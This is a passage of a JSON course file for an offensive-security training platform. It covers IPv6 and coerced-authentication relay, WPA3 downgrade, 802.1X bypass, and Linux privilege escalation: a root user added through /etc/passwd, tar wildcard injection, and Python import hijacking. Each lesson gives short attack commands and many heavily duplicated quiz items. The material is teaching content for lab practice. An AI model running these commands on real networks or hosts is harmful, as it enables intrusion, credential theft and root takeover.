password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ipv6-attack","cat":"Network Attacks","title":"IPv6 Attacks","diff":3,"xp":200,"intro":"Exploit unsecured IPv6 on dual-stack networks.","sections":[{"type":"text","content":"Send rogue router advertisements to become the default gateway."},{"type":"code","lang":"bash","content":"mitm6 -d target.local\nimpacket-ntlmrelayx -6 -t ldaps://DC -wh fake.target.local"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"IPv6 attacks work because...","opts":["IPv6 is faster","Admins forget IPv6 firewall rules","IPv6 is encrypted","IPv6 uses different ports"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-coerce-auth","cat":"Network Attacks","title":"Coerced Authentication","diff":4,"xp":250,"intro":"Force machines to authenticate to you.","sections":[{"type":"text","content":"PetitPotam, PrinterBug, DFSCoerce trigger auth requests."},{"type":"code","lang":"bash","content":"python3 PetitPotam.py listener_ip target_ip\nimpacket-ntlmrelayx -t http://ADCS/certsrv/certfnsh.asp --adcs"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Coerced auth forces a machine to...","opts":["Reboot","Authenticate to an attacker-controlled listener","Change password","Disable firewall"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-wpa3","cat":"Network Attacks","title":"WPA3 Attacks","diff":4,"xp":250,"intro":"Attack the latest WiFi security.","sections":[{"type":"text","content":"Timing side-channels (Dragonblood) and downgrade attacks."},{"type":"code","lang":"bash","content":"# Force WPA2 fallback via deauth\naireplay-ng -0 10 -a AP_MAC wlan0mon\n# Capture WPA2 handshake and crack"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"WPA3's Dragonfly prevents...","opts":["All attacks","Offline dictionary attacks (but timing side-channels exist)","Online attacks","Deauth"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-802.1x","cat":"Network Attacks","title":"802.1X Bypass","diff":5,"xp":300,"intro":"Bypass port-based network access control.","sections":[{"type":"text","content":"Transparent bridge, MAC cloning, EAP relay."},{"type":"code","lang":"bash","content":"# Bridge bypass: place device between authenticated device and switch\nbrctl addbr br0 && brctl addif br0 eth0 eth1\n# MAC cloning\nmacchanger -m AA:BB:CC:DD:EE:FF eth0"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"802.1X bridge bypass works because...","opts":["It cracks passwords","The switch sees the original device's traffic","It disables 802.1X","It uses VPN"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"pe-proc-enum","cat":"Privilege Escalation","title":"Process Enumeration","diff":1,"xp":75,"intro":"Running processes reveal escalation paths.","sections":[{"type":"text","content":"Check for root services with writable configs, creds in cmdline args."},{"type":"code","lang":"bash","content":"ps aux | grep root\nps -ef | grep -iE 'pass|secret|key'\npspy  # monitor new processes"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Process cmdline reveals...","opts":["CPU usage","Credentials sometimes visible in arguments","Memory usage","Network connections"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-passwd-file","cat":"Privilege Escalation","title":"Writable /etc/passwd Exploit","diff":1,"xp":50,"intro":"Add a root user if /etc/passwd is writable.","sections":[{"type":"text","content":"Generate a hash and add a UID 0 user."},{"type":"code","lang":"bash","content":"openssl passwd -1 'pass123'\necho 'hacker:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"UID 0 means...","opts":["Normal user","Root user","Service account","Nobody"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-wildcard","cat":"Privilege Escalation","title":"Wildcard Injection","diff":2,"xp":150,"intro":"Abuse shell wildcard expansion in cron jobs.","sections":[{"type":"text","content":"Files named --checkpoint=1 become tar arguments when * expands."},{"type":"code","lang":"bash","content":"echo 'bash -p' > /tmp/shell.sh\ntouch -- '--checkpoint=1'\ntouch -- '--checkpoint-action=exec=sh /tmp/shell.sh'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Wildcard injection works because...","opts":["Tar has a bug","Shell expands * to filenames which become arguments","Cron is misconfigured","Filesystem is writable"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-python-hijack","cat":"Privilege Escalation","title":"Python Library Hijacking","diff":2,"xp":150,"intro":"Hijack imports in privileged scripts.","sections":[{"type":"text","content":"Create a malicious module in a writable directory that's checked first."},{"type":"code","lang":"bash","content":"python3 -c 'import sys; print(sys.path)'\n# If writable dir is in path:\necho 'import os; os.system(\"/bin/bash\")' > /tmp/module.py"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Python hijacking exploits...","opts":["Buffer overflows","Module search order with writable directories","Network protocols","File permissions"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An 